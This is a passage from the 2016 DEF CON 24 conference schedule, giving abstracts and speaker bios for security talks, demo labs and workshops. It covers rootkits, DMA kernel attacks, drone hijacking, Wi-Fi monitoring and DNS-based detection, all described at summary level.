Dr. Prabhakar has spent her career investing in world-class engineers and scientists to create new technologies and businesses. Her first service to national security started in 1986 when she joined DARPA as a program manager. She initiated and managed programs in advanced semiconductor technology and flexible manufacturing, as well as demonstration projects to insert new semiconductor technologies into military systems. As the founding director of DARPA's Microelectronics Technology Office, she led a team of program managers whose efforts spanned these areas, as well as optoelectronics, infrared imaging and nanoelectronics.
In 1993, President William Clinton appointed Dr. Prabhakar director of the National Institute of Standards and Technology, where she led the 3,000-person organization in its work with companies across multiple industries.
Dr. Prabhakar moved to Silicon Valley in 1997, first as chief technology officer and senior vice president at Raychem, and later vice president and then president of Interval Research. From 2001 to 2011, she was a partner with U.S. Venture Partners, an early-stage venture capital firm. Dr. Prabhakar identified and served as a director for startup companies with the promise of significant growth. She worked with entrepreneurs focused on energy and efficiency technologies, consumer electronics components, and semiconductor process and design technologies.
Dr. Prabhakar received her Doctor of Philosophy in applied physics and Master of Science in electrical engineering from the California Institute of Technology. She received her Bachelor of Science in electrical engineering from Texas Tech University. She began her career as a Congressional Fellow at the Office of Technology Assessment.
Dr. Prabhakar has served in recent years on the National Academies' Science Technology and Economic Policy Board, the College of Engineering Advisory Board at the University of California, Berkeley, and the red team of DARPA's Defense Sciences Research Council. In addition, she chaired the Efficiency and Renewables Advisory Committee for the U.S. Department of Energy. Dr. Prabhakar is a Fellow of the Institute of Electrical and Electronics Engineers, a Member of the National Academy of Engineering, a Texas Tech Distinguished Engineer, and a Caltech Distinguished Alumna.
Twitter: @DARPA,
#DARPACGC
Facebook
Return to Index
Demolabs - Table 2 - Saturday - 12:00-13:50
DataSploit
Shubham Mittal
-Performs automated OSINT on a domain / email / username / phone and find out relevant information from different sources.
-Useful for Pen-testers, Cyber Investigators, Product companies, etc.
-Correlates and collaborate the results, show them in a consolidated manner.
-Tries to find out credentials, api-keys, tokens, subdomains, domain history, legacy portals, etc. related to the target.
-Available as single consolidating tool as well as standalone scripts.
-Available in both web GUI and Console.
Shubham is an active Information Security researcher with 4 years of experience in offensive and defensive security, with interests in defensive security and OSINT. He has given training, conducted numerous workshops and delivered talks at local security chapters and multiple conferences, including Nullcon 2016, Blackhat Asia 2016, Null Delhi and Bangalore chapters, IETF, etc. In his free time, he loves to craft open source tools in python, and if the weather is nice, he loves to ride his bike. Twitter handle: @upgoingst
Return to Index
WOS - Skyview 6 - Friday - 12:10-12:59
Deceive and Succeed: Measuring the Efficiency of a Deception Eco-System in Post-Breach Detection
Omer Zohar, Head of Research at TopSpin Security
Today's networks are undergoing all sorts of sinister attacks from numerous sources and for myriad reasons. Security at the perimeter is inadequate for thwarting today's highly intelligent attacks as hackers routinely breach the perimeter and gain entry. It isn't long before the network is compromised and critical information is stolen. We must now assume that, despite significant investments in prevention, breaches are going to happen. An additional approach is required. Security teams must go on the offensive, creating a web of non-stop, real-time detection operations using multiple vectors against an ever-changing landscape of cyber threats. Deception technology now plays a critical role. Used as a strategy for many centuries in actual warfare, the concept of deception is becoming a significant weapon in network-protection schemes. Deception technology doesn't rely on known attack patterns and monitoring. Instead, it employs very advanced luring techniques to entice attackers away from valuable company assets and into pre-set traps, thus revealing their presence. It is able to detect threats in real time without relying on any signatures, heuristics or complex behavioral patterns. But how effective is a deception strategy in detecting breaches? What method works best? How does it integrate with current security operations already in place?
In this talk we will present findings from a first ever research which measured the efficiency of proactive deception using mini-traps and decoys in real-life threat scenarios. We have reconstructed a real enterprise environment complete with endpoints, servers, network traffic and data repositories as well as security tools such as IDS, firewall, SIEM etc. The deception layer was then integrated into the environment in 2 steps: (a) by placing decoys in the network and (b) by placing mini-traps on the assets which point to the decoys, set false credentials, trigger silent alarms and more. We then evaluated the effectiveness of the mini-traps and decoys against both automated, machine-based attacks as well as against sophisticated human attacks: The first stage involved checking the behavior of a variety of malware families against the environment and measuring the deception layer's success in detecting their activity. For the second phase, we invited red-team professionals and white hat hackers to employ real techniques and advanced tools with the task of moving laterally in the environment and exfiltrate high value data.
Omer Zohar has over a decade of experience as a developer and researcher in the data security market. As head of Research for TopSpin Security he is responsible for the research of malware and post-breach detection methods and for defining advanced detection schemes.
Return to Index
Demolabs - Table 6 - Saturday - 16:00-17:50
Deep look at back end systems of the future of credit card fraud
Weston Hecker
Taking a deeper look at the future of credit card fraud platforms including custom built carder site for sale of live skimmed data, Designing a "Blockchain" style deliver systems for live credit card data to Cash out devices. building a banking and credit processor back end from scratch. The DMVPN network design of the Carder site back end building "Lacara" and automating credit card cash out runs the devices behind the attack.
Weston Hecker 11 years pen-testing, Security Research, Programming. Speaker at Defcon 22, 23 and 24 Las Vegas, HOPE 11, TakedownCON 2016,B-sides Boston, Blackhat 2016, Enterprise Connect 2016, ISC2, SC Congress Toronto. worked on several opensource tools. Including Skimbad Anti-CC-Fraud Platform,Opencodec, Hacker tools such as "CompanyBAN" a AD automated company wide lock out tool. Several SDR tools, Reversing Engineering of Malware. Telephone DDOS tools. Open-CV. Hardware includes ATM Shimmers Anti-Skimmers, Gaspump (Anti)Skimmers and OldyellerUSB./p>
Return to Index
DEFCON - DEF CON 101 - Thursday - 16:00-16:59
DEF CON 101 Panel
Mike Petruzzi (wiseacre)
Ryan Clark (LosT)
CrYpT
HighWiz
Jay
Nikita Kronenberg
DEF CON has changed for the better since the days at the Alexis Park. It has evolved from a few speaking tracks to an event that still offers the speakers, but also Villages, where you can get hands-on experience and Demo Labs where you can see tools in action. Of course, there is still the Entertainment and Contest Area, as well as Capture The Flag. There is so much more to DEF CON than there was in the past and it is our goal to help you get the best experience possible. In addition to introducing each of the different aspects and areas of DEF CON, we have a panel of speakers that will talk about how they came to be part of DEF CON and their personal experiences over the years. Oh yeah, there is the time honored "Name the Noob", lots of laughs and maybe even some prizes. Plus, stay for the after party. Seriously, there is an after party. How awesome is that?
Mike Petruzzi (wiseacre) started at DEF CON participating in the Capture the Flag contest. Determined to do better the next year, he participated again. This time the format was 36 hours straight. He realized he was missing out on everything else that was happening at DEF CON. From then on he made a point to participate in as much as he could. Of course, within the limits of social anxiety so, if it allowed participation as a wallflower, he was in! Now, he wants to make sure everyone else gets to know as much as possible about this year's conference. In his private life, Mike hacks managers and is happy anyone listens to him at all. Mike would like to thank Highwiz for everything.
Ryan "LosT" Clarke has been involved with DEF CON for 16 years. In addition to his role on the CFP board, LosT serve's as DEF CON's official Cryptographer and Puzzle Master. He is best known for his early LosT @ CON Mystery Challanges designed to force creative thinking, and also introduced him to his amazing wife! Now he is responsible for designing the badges and lanyards for DEF CON, in addition to torturing a subculture of enthusiastic crypto fans with his ever-so-subtle clues and red herring rabbit holes in his yearly Badge challenge. LosT enjoys learning as much as he can about as much as he can. He can usually be found around CON in the 1o57 room, mostly encouraging and sometimes distracting a ragged band of sleep-deprived attendees who are racing to complete the challenge.
CrYpT first attended DEF CON at DC10 as CrAzE, where he made the common mistake of staying on the sidelines and not actively participating in all DEF CON had to offer. The experience was tough for him and he did not return for many years. He tried again at DC17, but this time he made the decision to start putting himself out there. After a marked improvement in the quality of his experience, he was determined to make each year better than the last. At DC20 he received the handle CrYpT from Y3t1 and met some people who would remain his closest friends to this day (looking at you Clutch). Now he leads the awesome, hard-working Inhuman Registration team in their quest to badge all the people. He's a member of the CFP Review Board and Security Tribe. In an effort to help welcome all the new faces at DEF CON, he is returning for his second year to the DC 101 panel. He encourages people to reach out and ask questions so they can get the most bang for their badge.
Born of glitter and moon beams, HighWiz is the things that dreams are made of and nightmares long to be... Years ago, with the help of some very awesome people* he set about to create an event that would give the n00bs of Def Con a place to feel welcomed and further their own pursuit of knowledge. For years he has held onto the simple tenet that "You get out of Def Con what you put into it". Sometimes HighWiz can be a bit much to swallow and hard to take. HighWiz is a member of the CFP Review Board and Security Tribe.
*Some (but not all) of the people HighWiz would like to thank for helping to make 101 into what it is today : Runnerup, Wiseacre, Nikita, Roamer, Lockheed, Pyr0, Zac, V3rtgio, 1o57, Neil, Beaker, AlxRogan, Jenn, Zant, GM1, Clutch, TheDarkTangent, Siviak, Ripshy, Valkyrie, Xodia, Flipper and all the members of Security Tribe. After taking a year off from the 101 Panel, HighWiz is honored to once again be participating in it, as it marks its eighth year.
Jay Korpi is not of the traditional hacker world; CrYpT invited him to DEF CON 6 years ago, and as a surgical first assist, he decided it was not of any interest to him. CrYpT insisted every year until finally three years ago CrYpT told him "there are people there smarter than you..." Jay couldn't believe it and had to see it for himself. His first year, it was obvious there were MANY people smarter than he was. Once he met some amazing people who were both inviting and generous, Jay vowed to get involved with DEF CON somehow so he could provide the same experience to others. He found his opportunity last year when he joined the Inhuman Registration team and was invited to share his experiences on the DC 101 panel. He attributes these opportunities to his willingness to put himself out there and meet as many people as possible from his very first CON.
Nikita Kronenberg
Nikita works to ensure DEF CON runs as smoothly as one can expect from a hacker conference. In addition to planning a vast array of details prior to DEF CON and thwarting issues while onsite, she also serves as the Director of Call For Papers and Workshops. In this role she systematically processes hundreds of submissions, organizes the CFP Board, and manages the entire CFP process from beginning to end. While no one relishes the job of rejecting submissions, Nikita strives to make the experience more positive with personal feedback and alternative speaking opportunities. Once talks have been selected, she weaves the final list into a comprehensive four day schedule over multiple speaking tracks. She serves as a primary point-of-contact for speakers leading up to DEF CON and acts as a liaison between speakers, press, and social media content organizers. Beyond the CFP, Nikita also works full-time on various behind-the-scenes administration and project management for DEF CON. As a DEF CON goon for the past 13 years, her superpowers involve putting out fires before they spark and juggling a multitude of tasks while balancing on an over-inflated ball. - rkut nefr ldbj gtjd bjws oayh qtmf york uykr fqwx awtr kumf giwk nxtw -
Twitter: @Niki7a
Return to Index
Demolabs - Table 5 - Saturday - 12:00-13:50
DEF CON Wireless Collection Service (DCWCS)
darkmatter
Lots of information is encoded on electromagnetic radiation,
especially WiFi. The aim of this project is to listen to the WiFi
bands (2.4gHz/5gHz) and see if we pick up anything interesting during
DEF CON. This presentation will discuss the hardware decisions, what
software is used and how to build and configure your own WiFi
monitoring devices so you too can begin passive mass surveillance using
WiFi. And yes, we are listening.
darkmatter is a hardware and software hacker. His skills include
generating electron-hole pairs, reverse engineering, web stuff,
rainbow team 4, and wifi. He thinks he's a computer scientist.
Return to Index
Paris - Le Bar Du Sport - Friday - 18:00-18:59
DEFCON 24 Meetup for /r/Defcon - Date and Time (self.Defcon)
Here are the details, ya filthy hackers:
Location: Le Bar Du Sport (Right by the sports book), Paris Hotel & Casino
Date: Friday, August 5th, 2016
Time: 6:00pm
I will gather some chairs in the corner of the bar, closest to the sports book. Just ask around for me, I promise not to bite.
Return to Index
BHV - Skyview 4 - Saturday - 18:30-18:59
Speaker: Christian and Erin
@cdameffMDDr
About Christian and Erin:
Christian "quaddi" Dameff MD MS
Christian (quaddi) Dameff is an emergency medicine physician, former open capture the flag champion, prior DEF CON speaker, and researcher. Published works include topics such as therapeutic hypothermia after cardiac arrest, novel drug targets for myocardial infarction patients, and other Emergency Medicine related works with an emphasis on CPR optimization. Security research topics including hacking critical healthcare infrastructure and medical devices. This is his thirteenth DEF CON.
Erin Hefley is a resident physician in her final year of training with the Phoenix Integrated Residency in Obstetrics & Gynecology. She has a background in public health and women's health, and obtained a Master of Public Health degree from the University of Northern Colorado prior to attending medical school at the University of Arizona - Phoenix. This is her 6th Defcon attendance over the past decade, and she is thrilled to have witnessed the development and expansion of the Biohacking Village. Her current interests include reproductive health technology, women's health policy, running, and vampire erotica
Abstract:
An estimated 30 million Americans and 300 million people worldwide suffer from genetic disease, and 15% of American couples are affected by infertility. Current assisted reproductive technology is used to prevent genetic disease and assist with conception. Human capabilities are rapidly advancing past the present application of these technologies, providing exciting possibilities for selecting and enhancing characteristics of our offspring in the brave new world of 21 st century medicine.
This discussion will outline current reproductive science in the US and abroad, and discuss the bioethical, legal, and medical consequences of a future where babies can be designed to specification.
Return to Index
BHV - Skyview 4 - Saturday - 18:30-18:59
Speaker: Christian and Erin
@cdameffMDDr
About Christian and Erin:
Christian "quaddi" Dameff MD MS
Christian (quaddi) Dameff is an emergency medicine physician, former open capture the flag champion, prior DEF CON speaker, and researcher. Published works include topics such as therapeutic hypothermia after cardiac arrest, novel drug targets for myocardial infarction patients, and other Emergency Medicine related works with an emphasis on CPR optimization. Security research topics including hacking critical healthcare infrastructure and medical devices. This is his thirteenth DEF CON.
Erin Hefley is a resident physician in her final year of training with the Phoenix Integrated Residency in Obstetrics & Gynecology. She has a background in public health and women's health, and obtained a Master of Public Health degree from the University of Northern Colorado prior to attending medical school at the University of Arizona - Phoenix. This is her 6th Defcon attendance over the past decade, and she is thrilled to have witnessed the development and expansion of the Biohacking Village. Her current interests include reproductive health technology, women's health policy, running, and vampire erotica
Abstract:
An estimated 30 million Americans and 300 million people worldwide suffer from genetic disease, and 15% of American couples are affected by infertility. Current assisted reproductive technology is used to prevent genetic disease and assist with conception. Human capabilities are rapidly advancing past the present application of these technologies, providing exciting possibilities for selecting and enhancing characteristics of our offspring in the brave new world of 21 st century medicine.
This discussion will outline current reproductive science in the US and abroad, and discuss the bioethical, legal, and medical consequences of a future where babies can be designed to specification.
Return to Index
Wireless - Skyview 1 - Friday - 14:00-14:50
Matt Trimble (dEM)
Bio
"Matt Trimble is the Global Cyber Security Team Manager for Barracuda Networks. Matt's duties include Barracuda Networks' product security testing, Bug Bounty, Red Team, and CIRT. Matt spends most of his time leading his team of miscreants in trying to make the Internet a safer place for its denizens.
When Matt isn't putting out the latest Internet fire, he enjoys spending time with his wife and four kids. He enjoys hiking, jogging, and biking. Matt also enjoys hacking challenges. In 2015, Matt was on the team that won the DefCon Wireless CTF."
Eric Escobar (JusticeBeaver)
Bio
Eric Escobar is a Security Engineer at Barracuda Networks. His interests are broad and generally include putting computers in places you wouldn't expect. From chicken coops to rockets and even bee hives. Before being called to the dark side, Eric procured a Bachelor's and Master's degree in Civil Engineering. He now enjoys all things wireless, from WiFi, to SDR, and Ham Radio. Last year his team placed 1st in DEF CON 23's Wireless CTF.
Evil ESP
Abstract
"This talk will be on using the ESP8266 (ESP) Wifi module for nefariously awesome purposes. We intended to perform live demonstrations of the ESP in action and demonstrate how easy it can be to program (once you know how). The goal is to show how game changing a disposable (less than $3) WiFi device with extremely low power draw can be for the security community.
The talk will begin with an overview of what the ESP is, how to program it, and some history about the device. We will touch on our trials and tribulations in translating the documentation and how, to a large extent, this is no longer needed.
We will demonstrate using the ESP as a quick and dirty WiFi jamming device using both AP BSSID cloning and de-auth injection. A note will be made that this should only be done for research purposes as they may be considered radio jamming by the FCC, and thus illegal. We will talk about why both troubleshooting what is occurring and finding the device responsible for the attack are difficult. We will show demonstration of an ESP based de-auth-o-matic.
We will then build on the previous topics and discuss the ESPs use as a disposable Evil Twin. We will demonstrate using the ESP as an evil AP in a fictitious attack in a residential setting.
We will show how combining an ESP with other low cost IoT devices like the HopeRF transceiver can drastically increase the breadth of its capabilities. We will demonstrate a remote controlled de-auth device and how this decreases the risk to someone cracking a WiFi network.
We will close with a discussion that builds on the previous topics. We will discuss using the ESP as a disposable node in a low cost mass surveillance mesh network.
We will end with a Q\&A session."
Detecting and Finding Rogue Access Points
Abstract
"Rogue access points are a security concern for businesses, individuals, and muggles alike. The ability to detect and find a rogue access point is an invaluable skill to add to your hacker utility belt. This presentation will discuss how to detect rogue access points (APs) and what to do once you've detected one. We'll discuss inexpensive tools to add to your bag (once the Amazon drone has delivered them), including types of antennas, network adapters and some other odds and ends to round out your toolbox.
Once weve covered some the basics and outfitted your bag well chat about techniques you can use to find that rogue AP, whether that be wardriving your neighborhood, or suiting up your pet with tech. This talk will cover tactics weve used to Find the Fox at the past couple of wireless capture the flag competitions, and even how to create a pretty heat map of wireless access points in your neighborhood. Well talk about tactics weve used in the field and all the ways weve messed it up. "
|
Return to Index
DEFCON - Track Three - Saturday - 10:00-10:59
Developing Managed Code Rootkits for the Java Runtime Environment
Benjamin Holland ISU Team, DARPA's Space/Time Analysis for Cybersecurity (STAC)
Managed Code Rootkits (MCRs) are terrifying post-exploitation attacks that open the doors for cementing and expanding a foothold in a target network. While the concept isn't new, practical tools for developing MCRs don't currently exist. Erez Metula released ReFrameworker in 2010 with the ability to inject attack modules into the C# runtime, paving the way for MCRs, but the tool requires the attacker to have knowledge of intermediate languages, does not support other runtimes, and is no longer maintained. Worse yet, the ‘write once, run anywhere’ motto of managed languages is violated when dealing with runtime libraries, forcing the attacker to write new exploits for each target platform.
This talk debuts a free and open source tool called JReFrameworker aimed at solving the aforementioned challenges of developing attack code for the Java runtime while lowering the bar so that anyone with rudimentary knowledge of Java can develop a managed code rootkit. With Java being StackOverflow's most popular server side language of 2015 the Java runtime environment is a prime target for exploitation. JReFrameworker is an Eclipse plugin that allows an attacker to write simple Java source to develop, debug, and automatically modify the runtime. Best of all, working at the intended abstraction level of source code allows the attacker to ‘write once, exploit anywhere’. When the messy details of developing attack code are removed from the picture the attacker can let his creativity flow to develop some truly evil attacks, which is just what this talk aims to explore.
Ben Holland is a PhD student at Iowa State University with experience working on two high profile DARPA projects. He has extensive experience writing program analyzers to detect novel and sophisticated malware in Android applications and served on the ISU team as a key analyst for DARPA's Automated Program Analysis for Cybersecurity (APAC) program. He's lectured on security topics for university courses in program analysis and operating system principles. Ben has given multiple talks at professional clubs as well as security and academic conferences. His past work experience has been in research at Iowa State University, mission assurance at MITRE, government systems at Rockwell Collins, and systems engineering at Wabtec Railway Electronics. Ben holds a M.S. degree in Computer Engineering and Information Assurance, a B.S. in Computer Engineering, and a B.S. in Computer Science. Currently he serves on the ISU team for DARPA's Space/Time Analysis for Cybersecurity (STAC) program.
Twitter: @daedared
ben-holland.com
Return to Index
DEFCON - Track Three - Friday - 14:00-14:59
Direct Memory Attack the Kernel
Ulf Frisk Penetration Tester
Inexpensive universal DMA attacking is the new reality of today! In this talk I will explore and demonstrate how it is possible to take total control of operating system kernels by DMA code injection. Once control of the kernel has been gained I will execute code and dump gigabytes of memory in seconds. Full disk encryption will be defeated, authentication will be bypassed and shells will be spawned. This will all be made possible using a $100 piece of hardware together with the easy to use modular PCILeech toolkit - which will be published as open source after this talk.
Ulf Frisk is a penetration tester working in the Swedish financial sector. Ulf focuses mainly on online banking security solutions, penetration testing and it-security audits during daytime and low-level coding during nighttime. Ulf has been working professionally with security since 2011 and has a dark past as a developer.
Twitter: @UlfFrisk
GitHub: github.com/ufrisk
Return to Index
Demolabs - Table 5 - Saturday - 10:00-11:50
Dirt Simple Comms v2 (DSC2)
Tyler Oderkirk
Scott Carlson
Secure decentralized wireless text messaging using the Raspberry Pi Zero and LoRA modulation in the 900MHz band.
Tyler Oderkirk Fullstack Computer Security Engineer
Scott Calrson Systems Engineer (Mechatronics)
Return to Index
Demolabs - Table 3 - Saturday - 10:00-11:50
Disable Single Step Debug with Xmode Code
Ke Sun
Ya Ou
Single step execution is a very important debug function in modern computer programming for effective and efficient trouble shooting. How to stop single step is also a critical research topic from anti-debug perspective. During the research of xmode code obfuscation (code with runtime 32bit/64bit mode switch), we found a very interesting point that WinDbg is not able to properly carry out single step command under certain situation. We wonder what's the reason behind it, is it a WinDbg bug or due to something else? We made in-depth investigation to answer these questions.
This open-source project will demonstrate how to disable single step debugging in WinDbg with xmode code. We will also reveal the details of this issue from system perspective.
Ke Sun is an independent security researcher. He focused on malware analysis, and reverse engineering. Dr. Sun graduated from UCLA.
Ya Ou is an independent security researcher. His work has been focusing on new exploit development, malware analysis, and reverse engineering.
Return to Index
DEFCON - Track Two - Sunday - 11:00-11:59
Discovering and Triangulating Rogue Cell Towers
JusticeBeaver (Eric Escobar) Security Engineer, Barracuda Networks Inc
The number of IMSI-catchers (rogue cell towers) has been steadily increasing in use by hackers and governments around the world. Rogue cell towers, which can be as small as your home router, pose a large security risk to anyone with a phone. If in range, your phone will automatically connect to the rogue tower with no indication to you that anything has happened. At that point, your information passes through the rogue tower and can leak sensitive information about you and your device. Currently, there are no easy ways to protect your phone from connecting to a rogue tower (aside from some Android apps which are phone specific and require root access). In this talk I'll demonstrate how you can create a rogue cell tower detector using generic hardware available from Amazon. The detector can identify rogue towers and triangulate their location. The demonstration uses a software defined radio (SDR) to fingerprint each cell tower and determine the signal strength of each tower relative to the detector. With a handful of these detectors working together, you can identify when a rogue cell tower enters your airspace, as well as identify the signal strength relative to each detector. This makes it possible to triangulate the source of the new rogue cell tower.
JusticeBeaver (Eric Escobar) is a Security Engineer at Barracuda Networks. His interests are broad and generally include putting computers in places you wouldn't expect. From chicken coops to rockets and even bee hives. Before being called to the dark side, Eric procured a Bachelor's and Master's degree in Civil Engineering. He now enjoys all things wireless, from WiFi, to SDR, and Ham Radio. Last year his team placed 1st in DEF CON 23's Wireless CTF.
Return to Index
DEFCON - Track Two - Saturday - 16:00-16:59
DIY Nukeproofing: A New Dig at 'Datamining'
3AlarmLampScooter Hacker
Does the thought of nuclear war wiping out your data keep you up at night? Don't trust third party data centers? Few grand burning a hole in your pocket and looking for a new Sunday project to keep you occupied through the fall? If you answered yes to at least two out of three of these questions, then 3AlarmLampscooter's talk on extreme pervasive communications is for you! You'll learn everything from calculating radiation half layer values to approximating soil stability involved in excavating your personal apocalypse-proof underground data fortress.
3AlarmLampScooter is an enigmatic armored mammal of the genus homo sapiens sapiens sapiens troglodyte found in caves and tunnels across the southeastern United States. As moderator of the subreddit /r/Neutron, 3AlarmLampscooter's enunciation espouses pervasive communication via excavation to protect from radiation and conflagration. When above-ground, 3AlarmLampscooter is a vocal transhumanism advocate developing 3D printed construction materials.
Reddit: /u/3AlarmLampScooter
Return to Index
BHV - Skyview 4 - Saturday - 13:00-13:59
Speaker: Meow Ludo Meow Meow
About Meow Ludo Meow Meow:
Meow-Ludo is the founder of biohacking in Australia, and works full time running BioFoundry. He is a full-time hacker, part-time federal political candidate, and is interested in interdisciplinary projects.He is interested in the ability of biohackers to create bioweapons and the regulations that aim to control them.
Abstract:
Meow will be presenting on the capabilities for biological weapons that are currently able to be produced in home or community bio labs. He will explore the role that emerging technologies play in drastically reducing the technological and cost barriers to creating these constructs, and suggest ways that legislation and regulation may be employed to ensure maximum freedoms and innovation coupled with effective monitoring. Make sure to get your vaccinations before attending please.
Return to Index
BHV - Skyview 4 - Saturday - 13:00-13:59
Speaker: Meow Ludo Meow Meow
About Meow Ludo Meow Meow:
Meow-Ludo is the founder of biohacking in Australia, and works full time running BioFoundry. He is a full-time hacker, part-time federal political candidate, and is interested in interdisciplinary projects.He is interested in the ability of biohackers to create bioweapons and the regulations that aim to control them.
Abstract:
Meow will be presenting on the capabilities for biological weapons that are currently able to be produced in home or community bio labs. He will explore the role that emerging technologies play in drastically reducing the technological and cost barriers to creating these constructs, and suggest ways that legislation and regulation may be employed to ensure maximum freedoms and innovation coupled with effective monitoring. Make sure to get your vaccinations before attending please.
Return to Index
Demolabs - Table 2 - Saturday - 14:00-15:50
DNS Analyse
John Heise
Want to know who was patient zero from that recent phishing campaign? Or what about what’s going through that ssh tunnel? DNS is an integral part of all internet traffic both benign and malicious, despite this it can be ignored as a part of network monitoring in favor of more active protocols such as HTTP. This is a major mistake as a large amount of intelligence can be gathered from this single source, dns traffic can easily be used to determine information about hosts and users on a network and an essential tool for defending a network.
Utilizing packet sniffing libraries, open source queueing and storage projects a flexible monitoring system can be assembled relatively easily. With this tool in hand and some simple RPZ’s a security engineer can have more impact than most network analysis and prevention products on the market.
This presentation will cover a walk through of a design for dns monitoring system, then how that system can be used to watch for malware traffic, exfiltrating data on dns, and peering into ssh tunneled traffic, and finally how this system can be used to feed RPZ as a defensive mechanism.
John Heise has done operations work from many year prior to joining the LinkedIn Security team. Jon has also been involved in organizing Hack Fortress since its inception in 2010.
Return to Index
SkyTalks - Skyview 3 - Friday - 11:00-11:59
Speaker: Munin
Talk: DNS Greylisting for Phun and Phishing Prevention
Phishing is a loathsome and irritating problem to ops personnel everywhere, and user education only goes so far. Given that most users visit, typically, a handful of domains in a day, and given most phishing domains last only about 24 hours, bringing the notion of greylisting from the email world to your local DNS resolver seems a good fit.
Return to Index
SE - Palace 2-5 - Friday - 16:00-16:55
Tomohisa Ishikawa
Tomohisa Ishikawa is a Japanese IT security consultant with seven years of experience. He is specialized in penetration testing, incident response, vulnerability management, secure development, and security education. He has various experiences in leading domestic and international IT security consultation projects, and many opportunities to teach security essentials, secure programming, and secure design. He holds a Bachelor of Arts in Computer Science, and several certifications such as CISSP, CISA, CISM, CFE, QSA and GIAC (GPEN, GWAPT, GXPN, GWEB, GSNA, GREM, and GCIH). He is also in a doctoral program where he will obtain his Ph.D. degree.
Return to Index
Wireless - Skyview 1 - Saturday - 13:00-13:50
Arthur Garipov
Bio
"Arthur Garipov is a network application security specialist at Positive Technologies.
He researches security of wireless technologies, mobile systems and IoT. Organizer of the MiTM Mobile and Drone Quest contests and workshops at PHDays V, VI."
@chopengauer
Drone Hijacking and other IoT hacking with GNU Radio and XTRX SDR
Abstract
"Internet of things is surrounding us.
Is it secure? Or does its security stand on (deemed) invisibility?
XTRX SDR (Software-defined radio) and GNU Radio can answer these
questions. In this presentation, we will play some modern wireless
devices. They have similar protocols, and none of them encrypts its
traffic.
We will show how easy it is to find them using XTRX SDR and
proprietary chipsets, and how to sniff/intercept/fuzz these devices
using a small python script and GNU Radio.
As an example we will show a Mousejack attack to wireless dongles,
wireless keyboard keylogger and even a drone hijacking."
|
Return to Index
DEFCON - Track Two - Sunday - 13:00-13:59
Drones Hijacking - multi-dimensional attack vectors and countermeasures
Aaron Luo Security Expert, Trend Micro
Drone related applications have sprung up in the recent years, and the drone security has also became a hot topic in the security industry. This talk will introduce some general security issues of the drones, including vulnerabilities existing in the radio signals, WiFi, Chipset, FPV system, GPS, App, and SDK. The most famous and popular drone product will be used to demonstrate the security vulnerabilities of each aspects, and recommendation of enforcements. The talk will also demo how to take control of the drone through the vulnerabilities.
The topic of hacking by faking the GPS signals has been shared before in Black Hat and DEF CON in the past, this talk will extend this topic to the drone security. we will demo the real-time hijacking program that we created for various drone, this program can take full control of the Drone’s maneuver by simply keyboard input. In addition, we will also introduce how to detect the fake GPS signals.
An open source tool supporting u-box GPS modules and SDR to detect fake GPS signals will be shared and published in the GitHub.
Aaron Luo is the cyber threat expert from Trend Micro Core Technology Group. Prior to joining Trend Micro, Aaron worked as a security consultant in the government cybercrime investigation department focusing on malware analysis, network forensics and protocol analysis.
He has started his security research since 2005 and is active in the information security communities in Taiwan. He was the founder of PHATE hacker group, and a core member of ZUSO Security. Now he is a member of CHROOT/HITCON security research group and is interested in reverse engineering, developing security attack/defense tools (such as Firewall, HIPS system, protocol analysis, RAT, shellcode, vulnerability scanner), network forensics, RF, IoT, and penetration testing.
Aaron has several research papers published in HITCON and SYSCAN360 such as "The Concept of Game Hacking & Bypassing Game Protection (Hackshield)" in HITCON (Hacks in Taiwan Conference) 2009 when he was just eighteen years old. Until today, he is still the youngest speaker ever in HITCON, and "Smashing iOS Apps For Fun And Profit" was also published in the 1st SYSCAN360 (2012).
Return to Index
WOS - Skyview 6 - Saturday - 15:10-15:59
Dynamic Population Discovery for Lateral Movement Detection (Using Machine Learning)
Rod Soto, Senior Security and Researcher at Splunk UBA
Joseph Zadeh, Senior Security Data Scientist at Splunk UBA
The focus of this presentation is to describe ways to automate the discovery of different asset classes and behavioral profiles within an enterprise network. We will describe data driven techniques to derive fingerprints for specific types of individual and subgroup behaviors. The goal of these methods is to add context to communications taking place within an enterprise as well as being able to identify when certain asset profiles change there behavioral fingerprint in such a way as to indicate compromise. The type of profiles we want to discover can be tied to human behavior (User Fingerprinting) or particular asset classes like WebServers or Databases (Hardware/Software Fingerprinting). Finally enriching these profiles with a small amount of network context lets us break down the behaviors across different parts of the network topology.
These techniques become important when we want to passively monitor for certain attacks against server hardware even without visibility into the local logs running on the server. For example we will cover the automated discovery and enrichment of DMZ assets and how we use these techniques to profile when a server has been planted with a Webshell or when an asset has been used to covertly exfil data. The methods we propose should be generic to apply to a wide variety of any kind of Layer 4/ Layer 7 traffic or just PCAP data alone.
Rod Soto (Twitter: @rodsoto) has over 15 years of experience in information technology and security. Currently working as a Security Researcher at Splunk User Behavioral Analytics. He has spoken at ISSA, ISC2, OWASP, DEF CON, Hackmiami, Bsides and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the 2012 Black Hat Las Vegas CTF competition and is the founder and lead developer of the Kommand & KonTroll competitive hacking Tournament series.
Joseph Zadeh (Twitter: @josephzadeh) studied mathematics in college and received a BS from University California, Riverside and an MS and PhD from Purdue University. While in college, he worked in a Network Operation Center focused on security and network performance baselines and during that time he spoke at DEF CON and Torcon security conferences. Most recently he joined Caspida as a security data scientist. Previously, Joseph was part of the data science consulting team at Greenplum/Pivotal helping focused on Cyber Security analytics and also part of Kaiser Permanente's first Cyber Security R&D team.
Return to Index
HHV - Contest Area - Sunday - 12:00-12:59
EagleCAD Basics
Casey
In this class we will go over the very basics of using EAGLE to design a 555 counter circuit. You will design a schematic as well as the circuit board itself. It is not required but will be helpful to know the difference between volts, amps, and ohms. This is a lecture where people can follow along on their own systems, but people are welcome to hang out and just watch/ask questions.
Return to Index
Workshops - Las Vegas Ballroom 6 - Saturday - 10:00-14:00
Embedded system design: from electronics to microkernel development
Rodrigo Maximiano Antunes de Almeida Professor, Federal University of Itajubá
The workshop consists of a introduction on the embedded systems design. We'll start building a simple electronic embedded system design. This will be used as the target platform. Later I pretend to talk about the low level side of C language as bit fields arrays and bitwise operations, pointers to fixed memory addresses/registers, how to access the microcontroler peripherals etc. These will be the base to develop a full embedded microkernel using ISO-C without the standard libraries. They will have a better understanding on the electronics-programming relationship and how these questions can impact on the kernel development. Aside they`ll get a deep knowledge in the kernel basic functions (processes scheduling, i/o drivers controller etc).
